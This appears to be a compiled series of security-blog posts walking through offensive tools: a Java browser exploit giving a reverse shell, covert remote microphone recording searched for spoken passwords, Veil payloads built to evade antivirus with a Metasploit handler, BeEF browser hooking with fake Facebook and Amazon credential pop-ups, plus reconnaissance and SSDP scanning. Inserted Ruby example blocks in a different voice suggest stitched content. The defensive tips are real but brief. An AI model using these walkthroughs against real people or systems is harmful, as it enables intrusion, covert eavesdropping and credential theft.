Channel: Metasploit – CYBER ARMS – Computer Security

Java Releases Zero-Day Patch – Why you Need to Install it Now


Java Setup

Oracle released an out-of-band Java patch yesterday to close two zero-day vulnerabilities that were already being exploited in the wild. If you haven’t done so, update now. The exploit code has been added to several underground crimeware kits, rapidly accelerating its spread on the internet. The patch stops a remote exploit that lets an attacker run code on a system that does nothing more than browse to a malicious page. That can include a full remote shell, which we will demonstrate below.

The exploit code has been publicly available for a while now and has been added to the ever popular security testing suite Metasploit. We will demonstrate the exploit using Backtrack 5 and the Social Engineering Toolkit.

Simply choose the “Java Applet JMX Remote Code Execution” template from the SET Browser Exploitation menu (SET hands the actual exploit off to Metasploit’s exploit/multi/browser/java_jre17_jmxbean module).

SET Java 0-Day

Then choose the type of shell you want to use. We just selected the Reverse Meterpreter Shell and chose the defaults for everything else.

Once SET is ready, it will execute Meterpreter and wait for an incoming connection. Now we just need to surf to the attacker machine from Windows:

Surf to page

It doesn’t seem that anything happens. No warnings or pop-ups.

But as you can see below, our Backtrack system has already sent the exploit code and created a remote session with the system:

SET Session Created

We can now view any sessions that were created. As you see below we have one active session from user Fred on a computer called Freds-PC at IP address 192.168.0.114.

We simply connect to the session with the “sessions -i” command and run “shell” to open a full remote Windows command shell:

SET Windows 7 Shell

In the example above all the user did was browse to a malicious webpage. With no warning at all a full remote shell was opened on the visiting system by an attacker.

Now, let’s go to the Java download page and download the latest update (Java 7 Update 11):

Java Update

Then let it install:

Java Setup Complete

Finally, let’s try surfing to the same malicious site again from our Windows 7 system and see what happens.

The webpage opens and acts like it did on the victim’s side. So far no change.

But if we look at the attacker side, we get an error message and more importantly no remote shell is opened:

After Update No Shell

That’s it! One Java update takes care of one of the nastiest Java exploits I have seen in a while.

Java seems to be a favorite target of hackers, and you never know when another zero-day might be discovered. If you haven’t done so already, I highly recommend downloading and using a script blocking program like NoScript to give you some extra security and control over what scripts and plug-ins are allowed to run. Better still, if you don’t actually need Java in the browser, disable the Java plug-in entirely; an exploit can’t reach code that isn’t loaded.



Remotely Recording Speech and Turning it into Searchable Text with Metasploit & Watson


WATSON-graphic-5

Technology has made some amazing advances in the past few years. It makes you wonder what computer security will look like in the future. For example, how cool would it be to be able to remotely turn on a microphone and record whatever is said near it, then process the recorded speech, turning it into searchable text and scanning it for keywords like “Password” or “Social Security Number”?

What if I said you can do that right now?

Well, you can!

Thanks to some amazing work by AT&T labs and “Sinn3r” from the Metasploit development team, you can now take any .wav file that contains spoken words, and search it for keywords like account information and passwords.

AT&T labs has opened up their “Watson” speech to text technology to the public, releasing a development SDK and API so programmers can add speech recognition to their products. With a proof of concept script written by Sinn3r from Rapid7, you can now add speech to text capability to Metasploit!

How does it work?

Amazing!

I will cover it in deeper detail in a following post, but here is a quick walk through:

I had a “target” system attach to my “attacker” Backtrack 5r3 box running a Java exploit. Once the target Windows 7 system (fully patched and updated of course, with AV protection enabled) ran the backdoored Java, I had an open session with it:

Active Sessions 2

Next, I simply ran the “record_mic” command to remotely turn on and capture any audio within the area of the target system:

Record_mic

Finally, I simply fed the resulting .wav file into the sound analyzer script. It converted the sound file to text and searched it for keywords.

Did it find anything?

Of course! It correctly scanned the file and noticed that the word “password” was mentioned:

IT WORKED CLOSE UP

Okay, it wasn’t 100% correct. I used a four number password, followed by a dash and four more numbers. As you can see, the AT&T program mistook it and tagged it as a phone number, dropping the first number off. I also said “secured” instead of “picture” at the beginning of the line.

AT&T tagged the transcription confidence level at .48, this means that the program was about 50% confident that it had the right translation, which was about correct.

Even so, this technology is AMAZING! You have to think, during the process a voice was copied live from a remote system, turned into text and then analyzed for keywords. Without any “voice training” like so many voice programs need, Watson pretty accurately deciphered the .wav file and gave us a useable output.

We will take a much closer look at this in the next few posts. There were a few hurdles to overcome getting the script to run on Backtrack 5r3, so I will create a step by step tutorial. We will even look at some other uses for the technology.

Awesome job AT&T, Sinn3r and the Metasploit development team!


Backtrack 5r3: Capturing Voice from Remote Mic and Converting it to Searchable Text


Okay, I introduced the cool capability of using Metasploit to capture remote voice via mic and then converting it into keyword searchable text in the last post. As promised, we will take a closer look at setting it up to work on Backtrack 5r3 in this post.

I am going to warn you up front, this can be quite a process, but well worth it.

In this tutorial we will be using a Windows 7 laptop as our target, Backtrack 5r3 as our “attacker” system, the Social Engineering Toolkit (SET), Metasploit, AT&T’s voice to text developer platform, and a proof of concept AT&T interface script by Metasploit developer Sinn3r.

Getting a .Wav file from Remote Mic

First thing you’re going to need is a remote shell. I have covered this A LOT on this blog, so I won’t spend time on it here. In this instance, I just used the Social Engineering Toolkit (SET) to create a Java based backdoor session to the Windows 7 laptop:

Active Sessions 2

Just connect to the session by typing “sessions -i 1” and then type “record_mic” at the Meterpreter prompt. This will turn on the remote mic, record any sound, and save it as a .wav file on the Backtrack 5 system.

Record_mic

Okay, let me stop right here for a minute. When you run “record_mic” with no arguments, for some odd reason it only records 1-3 seconds of audio. Not really a lot of time to get anything useful from it.

(NOTE: You can use the post module “record_mic” mentioned in sinn3r’s article if you would like. I just found that running the built in Meterpreter command is easier. And yes, they are a bit different, even though the name is the same. Newer Metasploit builds also accept a duration on the command line, “record_mic -d 20”; if yours does, use that instead of editing the source as below.)

So, one thing we need to do is change the default in the “record_mic” code so it will provide us some useful length .wav files.

It took me a while to find the actual “record_mic” script. The problem was that it isn’t in its own file, but included in the STDAPI webcam.rb script file!

The easiest way to find it is to search the drive for the file (“find / -name webcam.rb”).

It should find several, we are looking for the one in the STDAPI directory. Once you find it, edit the file and look for the following section:

Record_Mic Change

As you can see, here is our problem. The recording duration is set to one second! Change this to something more reasonable and save it.

I chose 20 seconds on mine:

Record_Mic New Value

Okay, now when we run “record_mic” we will get 20 seconds of recording time instead of a whole one second.

Much better!

Because we used SET to create the backdoor, it will save any .wav file to the “Program Junk” directory as seen below:

Record_mic

We now have a sound recording from the target laptop. That is actually all we need from the target system.
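Before feeding a capture to anything else it is worth checking that you actually got the length you expected and what format ffmpeg will have to convert. The following is an added example, not Metasploit’s code or Sinn3r’s script: it parses the RIFF/WAVE header of a .wav file, reports format and duration, applies a minimum-length check (the one-second default above is the failure mode it catches), and runs the same kind of keyword search the AT&T script did over a transcript. The WAV it builds is a constructed, silent test file so everything runs offline.

```ruby
# Added example, not Metasploit's or Sinn3r's code: inspect a record_mic capture
# and keyword-search a transcript. build_wav constructs the test input.
require 'stringio'

# Constructed input: a silent 16-bit PCM mono WAV of the given length.
def build_wav(seconds:, sample_rate: 11025, channels: 1, bits: 16)
  block_align = channels * bits / 8
  data_len = (seconds * sample_rate).to_i * block_align
  fmt = ['fmt ', 16, 1, channels, sample_rate, sample_rate * block_align,
         block_align, bits].pack('a4VvvVVvv')
  data = ['data', data_len].pack('a4V') + ("\x00".b * data_len)
  ['RIFF', 4 + fmt.bytesize + data.bytesize, 'WAVE'].pack('a4Va4') + fmt + data
end

# Walk the RIFF chunks; return format and duration, or nil for anything that
# is not an uncompressed PCM WAV (the uploader needed a known, converted format).
def wav_info(bytes)
  io = StringIO.new(bytes)
  head = io.read(12)
  return nil if head.nil? || head.bytesize < 12
  riff, _riff_len, wave = head.unpack('a4Va4')
  return nil unless riff == 'RIFF' && wave == 'WAVE'
  fmt = nil
  data_len = nil
  until io.eof?
    hdr = io.read(8)
    break if hdr.nil? || hdr.bytesize < 8
    id, len = hdr.unpack('a4V')
    if id == 'fmt '
      body = io.read(len)
      break if body.nil? || body.bytesize < 16
      # format tag, channels, sample rate, byte rate, block align, bits per sample
      fmt = body.unpack('vvVVvv')
    else
      data_len = len if id == 'data'
      io.seek(len, IO::SEEK_CUR)
    end
    io.seek(1, IO::SEEK_CUR) if len.odd? # RIFF pads odd-length chunks
  end
  return nil unless fmt && data_len && fmt[0] == 1 # 1 = PCM
  _format, channels, rate, _byte_rate, block_align, bits = fmt
  { channels: channels, sample_rate: rate, bits: bits,
    duration: data_len.to_f / (rate * block_align) }
end

# A one-second capture is useless; insist on a minimum length before uploading.
def long_enough?(info, min_seconds)
  !info.nil? && info[:duration] >= min_seconds
end

# Whole-word, case-insensitive keyword search over a transcript string.
def keyword_hits(transcript, keywords)
  keywords.select { |k| transcript =~ /\b#{Regexp.escape(k)}\b/i }
end

if __FILE__ == $PROGRAM_NAME
  info = wav_info(build_wav(seconds: 20))
  puts "#{info[:duration]}s, #{info[:sample_rate]} Hz, #{info[:bits]}-bit, " \
       "#{info[:channels]} ch, long enough: #{long_enough?(info, 10)}"
  puts keyword_hits('Open picture file, password is', %w[password account]).inspect
end
```

Point wav_info at the bytes of a file from ~/.msf4/loot/ (or SET’s “Program Junk” directory) and it will tell you immediately whether the duration edit took effect; the keyword list is whatever you want flagged in the transcript.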

Setting up the AT&T Program Interface

The next thing we need to do is feed that .wav file into AT&T’s Speech to text system. So, let’s take a look at getting Sinn3r’s program interface to work on Backtrack 5.

If you haven’t done so already, grab Sinn3r’s proof-of-concept program from the link on the Metasploit article page. You will need a couple things to get the program to work right:

  1. You need to sign up for the AT&T Developer’s free trial.
  2. AT&T will give you an API key and a secret key; you will need these later.
  3. You need to install ffmpeg to convert the Metasploit .wav files into AT&T readable files.
  4. You will also need the “att_speech” Ruby gem.
  5. And Ruby 1.9.3 installed.

I’ll let you figure out steps one and two, they should be self explanatory.

For step three just install ffmpeg by typing, ‘apt-get install ffmpeg.’

Steps four and five can be a pain.

When you download the Gems “att_speech” module and try to install it by typing “gem install att_speech” command you are probably going to get this error in BT5r3:

Ruby Celluloid Error

You need Ruby 1.9.2 or greater installed. That is really odd, as you most likely already do.

If you type “update-alternatives --config ruby” you will see all the installed Ruby versions as below:

Ruby is 192

Well, looky there, we HAVE 1.9.2 installed!

What to do?

I got around this by installing Ruby 1.9.3. To do it the easy way, I just installed RVM:

(Note: I followed step 1 from this website to get RVM installed.)

RVM Install 1

RVM Install 2

RVM Install 3

RVM Install 4

RVM Install 5

Now that we have Ruby 1.9.3 installed, let’s try “gem install att_speech” again:

RVM Install 6

Tada!

Almost done now!

Okay, if we have Sinn3r’s script, Ruby updated and ffmpeg installed, we should be all set.

Well, not quite. If you are running on OS X, the script will buzz right through and work great. On Linux, not so much. There are a couple more changes we need to make.

First set ffmpeg as the audio decoder and then remove the .tmp extensions in the code or it will confuse the poor ffmpeg program. I’ll make it easy for you, just open Sinn3r’s script, find the ffmpeg section and make it look like this:

wav analyzer change mmpeg tmp to wav

Now we are ready!

Running the AT&T API Script

Now we need to execute the script, don’t forget to point it at the directory that contains the “record_mic” .wav files, give it an output directory to store converted files in and most importantly, put in your AT&T provided API and secret numbers:

ruby ./d3v_wav_analyze.rb -i ~/.msf4/loot/ -o /tmp -a [API_KEY] -s [SECRET_KEY]

When run it will look something like this:

wavalyzer working on Backtrack

As you can see it worked!

Here is a closeup of the voice that was captured remotely from the mic, turned into text and keyword searched by the AT&T system, looking for the keyword – “Password”:

Backtrack Voice to Text Close Up

Okay, I must confess, the process isn’t perfect…

I said, “open secured file, password is 7743-9824…” and it translated it to “Open picture file, password is”

You will also notice that the AT&T program thought the password was a phone number, so it tagged it as a PHONE variable, dropping the first number.

Was it perfect? No…

And the cool thing is that it knows it wasn’t perfect in the translation. Notice the confidence rate: .480…

Basically it knew that it only got about 50% of the translation right. But when you think that Metasploit grabbed the voice from a remote laptop, converted it to a wav file, uploaded it to AT&T’s voice recognition software that converted it to searchable text, and correctly found that I said “password” – That is amazing!

I’ve had mixed results with the translations, one as low as 11%. But if you look at the Metasploit article, when Sinn3r tried it he got up to a 95% translation rate!

Pretty amazing stuff, and I am sure it will only get better. Hopefully you can see how this could be used to do other security related things. I can already think of another pretty sweet idea how this could be used and will hopefully get another tutorial up by the end of this week or next… If it works, lol!

Sorry about the length of this tutorial. But in all things in Security, nothing is perfect and I wanted to save you a ton of time by explaining the workarounds for the snags that I encountered when trying to get it to run on Backtrack 5.

I hope it works well for you and you enjoy it!

(For securing against this type of attack, don’t let your users run Java! Also, disable the webcam and microphone on your system if they are not needed!)


Buffer Overflow Exploit found in Nginx Server 1.3.9-1.4.0


Nginx Logo

Earlier this month Nginx disclosed a buffer overflow vulnerability in some versions of their product. Recently, Metasploit released an exploit module for the vulnerability.

Nginx, the ever popular open-source HTTP server and proxy, publicly disclosed that a stack-based buffer overflow was discovered in versions 1.3.9 – 1.4.0. According to Shodan there are almost 3 million servers on the web that use Nginx, with almost 12,000 running the affected versions.

A notification from Nginx stated that a specially crafted request could trigger a stack-based buffer overflow:

Nginx

The exploit released by Metasploit can take advantage of the overflow to run a payload that could include a remote shell:

This module exploits a stack buffer overflow in versions 1.3.9 to 1.4.0 of nginx. The exploit first triggers an integer overflow in the ngx_http_parse_chunked() by supplying an overly long hex value as chunked block size. This value is later used when determining the number of bytes to read into a stack buffer, thus the overflow becomes possible.

The issue has been fixed in Nginx 1.4.1 & 1.5.0 and a patch is available (see Nginx announcement above).
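The module description above packs the whole bug into one sentence: a hex chunk size accumulated without a bounds check overflows, and the wrapped value later decides how much to read into a fixed-size stack buffer. The following is an added illustration, not nginx’s code (which is C) and not the Metasploit module: it models a 64-bit signed accumulator, shows the unchecked parser wrapping on an overly long hex string, shows the check that rejects it before the multiply, and shows how a negative size survives a min() and becomes a huge unsigned read length. The width assumptions are the usual 64-bit off_t/size_t.

```ruby
# Added illustration, not nginx's code: hex chunk-size parsing with and without
# a bounds check, modelling a 64-bit signed off_t and an unsigned size_t.

OFF_T_MAX   = 2**63 - 1
SIZE_T_MASK = 2**64 - 1

# Two's-complement wrap to 64 bits: what the C accumulator does in practice
# once it overflows.
def wrap_off_t(n)
  n &= SIZE_T_MASK
  n >= 2**63 ? n - 2**64 : n
end

def valid_hex?(hex)
  hex.match?(/\A[0-9a-fA-F]+\z/)
end

# Unchecked parser: every digit is folded in, however many there are, so a
# long run of 'f' wraps the accumulator negative.
def parse_chunk_size_unchecked(hex)
  raise ArgumentError, 'not a hex chunk size' unless valid_hex?(hex)
  hex.each_char.reduce(0) { |size, c| wrap_off_t(size * 16 + c.hex) }
end

# Checked parser: refuse to multiply once the result could no longer fit.
# OFF_T_MAX / 16 is the largest size that still leaves room for one more
# digit (size * 16 + 15 <= OFF_T_MAX). Returns nil for an invalid size.
def parse_chunk_size_checked(hex)
  return nil unless valid_hex?(hex)
  size = 0
  hex.each_char do |c|
    return nil if size > OFF_T_MAX / 16
    size = size * 16 + c.hex
  end
  size
end

# min(chunk size, bytes available) cast to size_t, as a discard loop would do
# before copying into a fixed-size stack buffer. A negative chunk size passes
# the min() and becomes an enormous unsigned length.
def bytes_to_read(chunk_size, buf_len)
  [chunk_size, buf_len].min & SIZE_T_MASK
end

if __FILE__ == $PROGRAM_NAME
  evil = 'f' * 16
  puts "unchecked: #{parse_chunk_size_unchecked(evil)}"          # wrapped to -1
  puts "checked:   #{parse_chunk_size_checked(evil).inspect}"    # rejected
  puts "read len:  #{bytes_to_read(parse_chunk_size_unchecked(evil), 4096)}"
end
```

The fix is the single comparison in parse_chunk_size_checked: it runs before the multiply, so the accumulator can never leave the representable range, and the rejection happens in the parser rather than being discovered (or not) by whatever consumes the size later.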


Creating Remote Shells that Bypass Anti-Virus with “Veil”


Many people think that if they are running an Anti-Virus and a firewall, that they are generally safe from hacker attacks. But the truth is far from that. Meet “Veil” a remote shell payload generator that can bypass most current Anti-Virus programs.

Many Anti-Virus programs work by pattern or signature matching. If a program looks like malware that it has been programed to look for it catches it. If the malicious file has a signature that AV has not seen before, many will dutifully say that the file is clean and not a threat.

If you can change or mask the signature of malware, or a remote shell in this case, then most likely AV will allow it to run and the attacker gets a remote connection to the system.

Veil, a new payload generator created by security expert and Blackhat USA class instructor Chris Truncer, does just that. It takes a standard Metasploit payload and through a menu driven program allows you to create 21 different payloads that most likely will bypass anti-virus.

But how well does it work?

Following the directions on Chris’s page, I downloaded and installed Veil on my Kali (Backtrack) system.

Simply pick what payload you want:

Veil Payload Generator Menu

Then you can choose to use Metasploit’s standard msfvenom shellcode or supply your own. I just chose the default, msfvenom:

Veil Options

Next choose the type of payload, I just chose reverse TCP. Then enter the IP address of the Kali system and the port you want to use:

Veil setting remote address

Veil will then create the payload and present you with two options. You can feed the payload into Pyinstaller or Py2Exe to create a Windows executable file.

This is where I got a bit stuck. For some reason Pyinstaller did not want to co-operate on my Kali machine. Fussed with it for a while, then just followed Chris’s instructions for creating the .exe file on a Windows machine and it worked without a hitch.

Basically install Python, Py2exe, and PyCrypto on Windows (all in the same directory). Then just copy over your created payload.py file, the RunMe.bat file and setup.py (found in your Kali Veil directory), into your Windows Python Directory.

Run the Bat file and sit back and watch the magic. When it is done you will have a payload.exe file. Any Windows system that runs it will try to connect out to the Kali system.

Finally start a Metasploit payload handler on your Kali system so the remote shell can connect back to you. In Kali at a terminal prompt, type “msfconsole”, then use exploit/multi/handler, set the payload to the same Windows reverse TCP Meterpreter you chose in Veil, set LHOST and LPORT, and run exploit:

Veil Running

Make sure you use the same IP address as LHOST and port as LPORT that you used when creating the payload.

Now, when a Windows system runs the payload.exe file we get this:

Veil Session

A remote session.

Then if we type “shell”:

Veil Shell

This was a fully updated Windows 7 system with a very good Anti-Virus installed and updated with an intrusion detection system running. It didn’t see a thing.

This should prove that you can not trust in your Firewall and AV alone to protect you from online threats. Unfortunately many times your network security depends on your users and what they allow to run. Instruct your users to never run any programs or open any files that they get in an unsolicited e-mail.

Blocking certain file types from entering or leaving your network is also a good idea.

And finally, using a Network Security Monitoring system will help track down what happened and what was compromised if the worst does happen.

For more information on Veil, and other pentesting topics, check out Chris’s training session at Blackhat USA 2013!


Performing Automated Network Reconnaissance with Recon-NG


The Recon-NG Framework is a powerful tool that allows you to perform automated information gathering and network reconnaissance. Think of it as Metasploit for information collection.

Recon-NG automates a lot of the steps that are taken in the initial process of a penetration test. It has numerous features that allow you to collect user information for social engineering attacks, and network information for network mapping and much more.

You can automatically hit numerous websites to gather passive information on your target and even actively probe the target itself for data.

Anyone who is familiar with Metasploit will feel right at home as the interface was made to have the same look and feel. The command use and functions are very similar. Basically you can use Recon-NG to gather info on your target, then attack it with Metasploit.

INSTALLING RECON-NG

To install Recon-NG, simply download the program from the Recon-ng repository:

git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git

Then surf to the Recon-ng directory:

cd recon-ng

and run the program:

./recon-ng.py

Screenshot from 2013-06-15 23_09_58

Typing ‘help’ will bring up a list of commands:

Screenshot from 2013-06-15 23_11_00

Now, like Metasploit, you can type ‘show modules’ to display a list of available modules.

Screenshot from 2013-06-15 23_12_11

Some of the modules are passive, they never touch the target network, while some directly probe and can even attack the system you are interested in.

One tactic used to passively probe network structure is to use the Google search engine to enumerate site sub-domains. You know that there will be a http://www.some_target_name.com but what other subdomains are out there?

You can do a Google search for subdomains using the site: and inurl: switches. Then remove sub-domains (-inurl) that you find so other subdomains will appear. This can take a while to do by hand and can require a lot of typing if the target has a large number of sub-domains.

Recon-NG will do this for you automatically and record what it finds in a database.
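The loop described above (query, collect hostnames, exclude what you already have, query again) as an added example that is not Recon-ng’s code: two pure functions for building the query and extracting hostnames, a driver that repeats until a round finds nothing new, and a constructed stand-in for the search engine so it runs offline. fake_search and CONSTRUCTED_INDEX are the assumptions; in real use you would replace them with an HTTP client and a result parser.

```ruby
# Added example, not Recon-ng's code: the site:/-inurl: subdomain loop.
require 'uri'

# Next query: everything on the domain, minus the subdomains already found.
# The apex domain itself is never excluded, since -inurl:example.com would
# match every result.
def build_query(domain, known_hosts)
  excludes = known_hosts.reject { |h| h == domain }.sort.map { |h| "-inurl:#{h}" }
  (["site:#{domain}"] + excludes).join(' ')
end

# Hostnames at or under `domain` from a list of result URLs; malformed URLs
# and look-alike domains (example.com.evil.test) are dropped.
def extract_hosts(domain, urls)
  urls.map { |u| (URI.parse(u).host rescue nil) }
      .compact
      .map(&:downcase)
      .select { |h| h == domain || h.end_with?(".#{domain}") }
      .uniq
end

# Repeat until a round turns up nothing new. The block is the search backend:
# it takes a query string and returns an array of result URLs.
def enumerate_subdomains(domain, max_rounds: 10)
  found = []
  max_rounds.times do
    urls = yield build_query(domain, found)
    fresh = extract_hosts(domain, urls) - found
    break if fresh.empty?
    found.concat(fresh)
  end
  found.sort
end

# Constructed index standing in for Google. It honours -inurl: exclusions and,
# like a real engine, only hands back a few results per query, which is what
# forces the exclusion loop in the first place.
CONSTRUCTED_INDEX = %w[
  http://www.example.com/
  http://www.example.com/about
  https://mail.example.com/owa
  https://vpn.example.com/
  http://dev.example.com/login
  https://example.com/
  http://www.notexample.com/
  http://example.com.evil.test/
].freeze

def fake_search(query)
  excluded = query.scan(/-inurl:(\S+)/).flatten
  CONSTRUCTED_INDEX.reject { |u| excluded.include?(URI.parse(u).host) }.first(3)
end

if __FILE__ == $PROGRAM_NAME
  puts enumerate_subdomains('example.com') { |q| fake_search(q) }
end
```

The filter in extract_hosts matters more than it looks: a naive substring match on “example.com” would happily record example.com.evil.test as a finding, which is exactly the sort of junk that ends up in a report if the enumeration is not anchored on the real suffix.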

Just use the ‘recon/hosts/gather/http/web/google_site’ module. Then ‘show options’ to see what the module requires. This one only requires a target domain.

As in Metasploit just type ‘set domain targetname.com‘. Then just type ‘run‘ and the module will execute as seen below:

Screenshot from 2013-06-15 23_22_33

As you can see from the screenshot Recon-NG is enumerating the sub-domains for Microsoft. Within seconds, several of the sub-domains are listed.

All the data collected by Recon-NG is placed in a database. You can create a report to view the data collected. Just type ‘back‘ to get out of the current module and then ‘show modules‘ again. Simply use one of the report modules to automatically create a nice report of the data that you have obtained.

Here is a sample of the HTML report:

Screenshot from 2013-06-15 23_30_16

Sub-domain enumeration is only one module you can run; there are many others to choose from. Some require an API key for the service they query, such as Twitter, Shodan, LinkedIn or Google. Using these you can get specific information from the corresponding sites about your targets.

For example you can search Twitter for tweets from your target or even check Shodan for open systems.

I have just briefly touched on some of the capabilities of Recon-NG. It is really an impressive tool that is well worth checking into.

For more information check out the Recon-NG Wiki page!


Owning Firefox & Chrome Browsers using Kali and BeEF


The internet can be a very unfriendly place, especially for older operating systems like Windows XP. In this post we will take a look at exploiting Windows XP browsers using BeEF, the Browser Exploitation Framework.

It has been a long time since I have done a post on BeEF, about three years in fact, but after going through a great Web Application and XSS security class, I figured it was time to brush it off again. I was very pleased to find that a ton of new features (called commands) have been added to BeEF since I last used it, dramatically increasing its functionality.

Granted a lot of the attacks in BeEF no longer work against Windows 7 with the latest browsers, but it seems that Windows XP systems are still very vulnerable to many of the browser attacks, even when using the latest browsers.

So let’s see what BeEF can do against a Windows XP system.

First we need to start the Exploitation Framework. In Kali, just open a terminal and type:

Running BeEF

This starts the BeEF server and shows you the web address to open the graphical user interface and a couple sample pages that you can use to hook browsers:

Browser Exploitation Main Screen

Just surf to 127.0.0.1:3000/ui/panel to view the user interface and log in with the username and password ‘beef’ (the defaults; change them in BeEF’s config.yaml before the server is reachable by anyone else):

BeEF Login

You will now be greeted with the BeEF control panel:

Beef Control Panel

Listed under the “Getting Started” section you will see links for two test pages that you can use to play with hooking browsers. I like the “Advanced version” as it looks like a real webpage.

On our XP system running the latest Firefox browser, if we surf to the “Malicious” demo page that BeEF creates, we will see this screen:

 WinXP Firefox 22

Or this if we are using Chrome:

XP with Chrome

The page shows some delicious looking beef, and nothing really seems awry. But what the user can’t tell is that this particular webpage contained a hook: a small piece of JavaScript (hook.js) that calls back to the BeEF server and allows an attacker to hook the browser and, well, pretty much take over complete control of the browser.

As soon as the visitor simply visits the page, the hook is set. Notice that the user does not have to run anything or mouse over anything for the attack to work. Just visiting the page triggers the attack.

When machines are hooked, they show up in the BeEF control panel:

Browser Hooked

Now that we have the system listed in the control panel, we simply click on the system we want to attack and then pick from the numerous attacks listed in the commands section:

BeEF Commands

Using these commands we can grab information from the victim’s browser, or even change what they see. For example, if we want to try to Social Engineer them and grab their Facebook credentials we can go to the Social Engineering tab and click “Pretty Theft”.  And then ‘Execute’.

On the victim’s browser a pop up will appear:

fake facebook login

Oh no! My Facebook timed out!

If the user fills in their creds and hits Log in, this appears in the BeEF control panel:

fake facebook login cred grab

Or we could try to grab credit card numbers with this Amazon looking attack:

Amazon Credit 1

BeEF can do much more than just send pop-ups. You can grab the HTML of the webpage that the victim is on:

Beef Get Page HTML

And then change any links on the page in realtime, without the user ever knowing, to point to wherever  you want the victim to go. Here is a look at the webpage source after changing all the links on the page to point to the Dallas Cowboys website:

Href change

Of course an attacker wouldn’t normally send them to a sports site, but most likely a website that was, say, a complete spoof of Amazon or Facebook.

You can also send custom Javascript, or even tie it in with Metasploit to attempt to get a remote shell.

As you can see, an attacker having control over the browser can be very bad.

The attacks are color coded as to the chance that they might work. But I did notice that some attacks that were marked red did in fact work, while some marked green did not.

I also noticed that newer browsers seemed to stop some of the attacks, but XP was still pretty open as to what would work against it.

I tried these attacks against a Windows 7 system and nothing was displayed:

Windows 7 No connection

A hook was created, but only lasted for about a second or two before it was dropped.

The best mitigation against this type of attack is to use the latest Windows OS and browser versions. If you can, update or replace your Windows XP systems, especially if they are used online. The base security in Windows 7 and 8 is much better than WinXP. Finally always run a script blocker like “NoScript”, and don’t click on or open links and attachments in unsolicited email and social media messages.


SSDP Scanning for UPnP Vulnerabilities


One day I was monitoring a system for network traffic and noticed that an SSDP service was communicating out from the machine to the IPv4 and IPv6 multicast ranges. Kind of odd, as the machine was firewalled and should not have been communicating with anything at that time.

So what was it?

SSDP (Simple Service Discovery Protocol) is the protocol that advertises and looks for network services. On Windows systems, the SSDP Discovery service handles this communication for the Universal Plug and Play feature (UPnP).

Well, UPnP has not been without its issues, and earlier this year HD Moore of Rapid7 created a utility that would both scan for SSDP responders and notify you if the system was vulnerable to known UPnP exploits.

What is interesting about the “UPnP SSDP M-SEARCH Information Discovery” module (auxiliary/scanner/upnp/ssdp_msearch) is that it not only tells you if the machine is vulnerable to UPnP exploits, but also returns interesting information about the machine.

So if the system isn’t vulnerable, chances are that you will at least be able to tell that:

  • It is up and running
  • The service that is running
  • And a valid user name!

The search tool is already included in Metasploit. So all you need to do is load the module and feed it a network range (RHOSTS):

SSDP search

Then type “run” or “exploit” and it will scan the network range looking for systems advertising UPnP services:

SSDP search results 1

Okay, it found one. It doesn’t appear to be vulnerable, if it were the uPnP vulnerabilities would be listed with the return.

But if you notice there is an HTML link: the LOCATION URL of the device description document. In this case, if we click the link, we are presented with a bunch of information that includes the machine name and a valid user name!

User results

As you can see from the scan results above, the Media Server was running on this machine, and a valid PC name and username is listed (blocked out to protect the innocent).

For security departments, running this utility against your company will quickly show any services that are being openly broadcasted on your net. If these services are reachable from the internet (over 40 million are!) then you have some serious configuration issues that need to be addressed.
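The exchange the scanner performs, as an added example that is not the Metasploit module’s code: build the multicast M-SEARCH probe, parse a unicast reply into its headers, flag the LOCATION the page talks about, and pull the friendlyName (where Windows Media Player sharing puts the user and PC name) out of the device description XML that LOCATION points to. The reply and the XML are constructed samples that reuse the page’s Fred/Freds-PC/192.168.0.114 names, not captures from a real device.

```ruby
# Added example, not the Metasploit module's code: SSDP M-SEARCH request,
# response parsing and device-description extraction, all offline.

SSDP_ADDR = '239.255.255.250'
SSDP_PORT = 1900

# The discovery probe the scanner multicasts. ST ssdp:all asks every UPnP
# device on the segment to answer; MX is the maximum delay in seconds.
def build_msearch(mx: 2, st: 'ssdp:all')
  [
    'M-SEARCH * HTTP/1.1',
    "HOST: #{SSDP_ADDR}:#{SSDP_PORT}",
    'MAN: "ssdp:discover"',
    "MX: #{mx}",
    "ST: #{st}",
    '', ''
  ].join("\r\n")
end

# Parse an "HTTP/1.1 200 OK" unicast reply into a hash keyed by upcased
# header name. Returns nil for anything that is not a search response.
def parse_ssdp_response(raw)
  status, *lines = raw.split(/\r?\n/)
  return nil unless status =~ %r{\AHTTP/1\.[01] 200}
  headers = {}
  lines.each do |l|
    break if l.empty?
    k, v = l.split(':', 2)
    next unless v
    headers[k.strip.upcase] = v.strip
  end
  headers
end

# Worth a closer look: a LOCATION we can fetch over plain HTTP.
def interesting?(headers)
  !!(headers && headers['LOCATION'] && headers['LOCATION'].start_with?('http://'))
end

# The fields shown on the page. A regex is enough for a flat UPnP device
# document; use a real XML parser if you feed this untrusted input at scale.
def device_summary(xml)
  grab = ->(tag) { xml[%r{<#{tag}>([^<]*)</#{tag}>}, 1] }
  { friendly_name: grab['friendlyName'], model: grab['modelName'], udn: grab['UDN'] }
end

# Constructed sample reply (not a capture), in the shape a Windows UPnP
# device host sends back.
CONSTRUCTED_REPLY = [
  'HTTP/1.1 200 OK',
  'CACHE-CONTROL: max-age=1800',
  'EXT:',
  'LOCATION: http://192.168.0.114:2869/upnphost/udhisapi.dll?content=uuid:0000-0000',
  'SERVER: Microsoft-Windows-NT/5.1 UPnP/1.0 UPnP-Device-Host/1.0',
  'ST: upnp:rootdevice',
  'USN: uuid:0000-0000::upnp:rootdevice',
  '', ''
].join("\r\n")

# Constructed sample device description (not a capture).
CONSTRUCTED_DESCRIPTION = <<~XML
  <?xml version="1.0"?>
  <root xmlns="urn:schemas-upnp-org:device-1-0">
    <device>
      <deviceType>urn:schemas-upnp-org:device:MediaServer:1</deviceType>
      <friendlyName>Fred: Fred's Library (Freds-PC)</friendlyName>
      <modelName>Windows Media Player Sharing</modelName>
      <UDN>uuid:0000-0000</UDN>
    </device>
  </root>
XML

if __FILE__ == $PROGRAM_NAME
  print build_msearch
  h = parse_ssdp_response(CONSTRUCTED_REPLY)
  puts "LOCATION: #{h['LOCATION']} (interesting: #{interesting?(h)})"
  puts device_summary(CONSTRUCTED_DESCRIPTION).inspect
end
```

To turn this into a live probe you would send build_msearch over a UDP socket to 239.255.255.250:1900, collect unicast replies for MX seconds, run each through parse_ssdp_response, and fetch any LOCATION with an HTTP client before handing the body to device_summary. For defenders the same parser works the other way round: anything answering an M-SEARCH from a segment that should not be serving UPnP is a misconfiguration to chase.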



